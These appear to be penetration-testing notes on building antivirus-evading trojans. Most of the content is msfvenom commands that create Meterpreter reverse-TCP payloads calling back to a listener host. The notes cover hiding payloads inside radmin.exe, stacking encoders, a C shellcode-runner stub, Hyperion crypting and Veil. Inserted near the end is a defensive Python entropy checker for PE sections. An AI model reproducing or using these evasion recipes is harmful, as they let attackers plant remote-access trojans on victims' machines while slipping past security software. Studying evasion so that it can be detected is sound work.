Trojans: Bypassing Anti-Virus Signature Detection
Techniques:
1- Binary Embedding
2- Metasploit Encoding
3- Multi-Encoding
4- Combining Techniques
5- Custom Compiling
6- Creating Shellcode
7- Hyperion
8- Veil
(1) Binary Embedding
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe
-x  executable template
-k  run the shellcode in a new thread
(2) Metasploit Encoding
We can also run our shellcode through an encoder to obfuscate it.
msfvenom -l encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f exe > meterpreterencoded.exe
(3) Multi-Encoding
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f raw > meterpreterencoded.bin
msfvenom -p - -f exe -a x86 --platform windows -e x86/bloxor -i 2 > meterpretermultiencoded.exe < meterpreterencoded.bin
-p -  read the (already encoded) raw payload from stdin instead of generating a new one
(4) Combining Techniques
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windows-binaries/radmin.exe -k -e x86/shikata_ga_nai -i 10 -f exe > radminencoded.exe
(5) Custom Compiling
#include <stdio.h>
/* paste the output of the "Creating Randomness" command below (placeholder) */
unsigned char random[] = "RANDOM_CHARS_HERE";
/* paste the output of the msfvenom -f c command below (placeholder) */
unsigned char shellcode[] = "SHELLCODE_BYTES_HERE";
int main(void) {
    ((void (*)())shellcode)(); /* treat the buffer as a function and jump into it */
}
(6) Creating Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f c -e x86/shikata_ga_nai -i 5
Creating Randomness:
cat /dev/urandom | tr -dc A-Z-a-z-0-9 | head -c512
Compiling:
i586-mingw32msvc-gcc -o custommeterpreter.exe custommeterpreter.c
(7) Hyperion
Encrypts the executable with AES and discards the key.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f exe > meterpreter.exe
cd Hyperion-1.0/
wine ../hyperion ../meterpreter.exe bypassavhyperion.exe
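From the defender's side, the encoders and Hyperion above leave the same trace: payload bytes that are close to uniformly distributed, which a signature scan never sees but an entropy check does. The following is an added example, not from the original notes: a minimal PE section parser plus a per-section entropy check; the 7.2 threshold and the constructed two-section sample image are assumptions.

```python
import math
import random
import struct

ENTROPY_THRESHOLD = 7.2  # assumed cut-off: ordinary x86 code and data sit well below this

def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for empty input, up to 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)
def pe_sections(image):
    """Return (name, raw bytes) for each section; parses only the headers it needs."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # COFF file header
    nsections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size                          # section table follows the optional header
    sections = []
    for i in range(nsections):
        entry = table + i * 40                            # each IMAGE_SECTION_HEADER is 40 bytes
        name = image[entry:entry + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, entry + 16)
        sections.append((name, image[raw_ptr:raw_ptr + raw_size]))
    return sections
def suspicious_sections(image, threshold=ENTROPY_THRESHOLD):
    """Names and (rounded) entropies of sections at or above the threshold."""
    scored = [(n, shannon_entropy(d)) for n, d in pe_sections(image)]
    return [(n, round(e, 2)) for n, e in scored if e >= threshold]
def build_test_image():
    """Constructed sample: a repetitive .text section and a pseudo-random .rsrc blob."""
    text = bytes([0x90, 0xC3] * 512)                      # NOP/RET filler, about 1 bit/byte
    rng = random.Random(1337)                             # seeded so the sample is reproducible
    blob = bytes(rng.getrandbits(8) for _ in range(4096)) # stands in for an encrypted payload
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)      # e_lfanew -> PE header at offset 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0)  # 2 sections, no optional header
    hdr_len = len(dos) + len(coff) + 2 * 40
    def sect(name, data, ptr):
        return name.ljust(8, b"\0") + struct.pack("<IIII", len(data), 0, len(data), ptr) + b"\0" * 16
    table = sect(b".text", text, hdr_len) + sect(b".rsrc", blob, hdr_len + len(text))
    return dos + coff + table + text + blob
```

Run suspicious_sections() over a real binary's bytes; sections that are not compressed resources yet score near 8 bits/byte are the ones to pull apart further.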
(8) Veil
Framework for using different techniques to bypass antivirus.
cd Veil-Evasion-master
./Veil-Evasion.py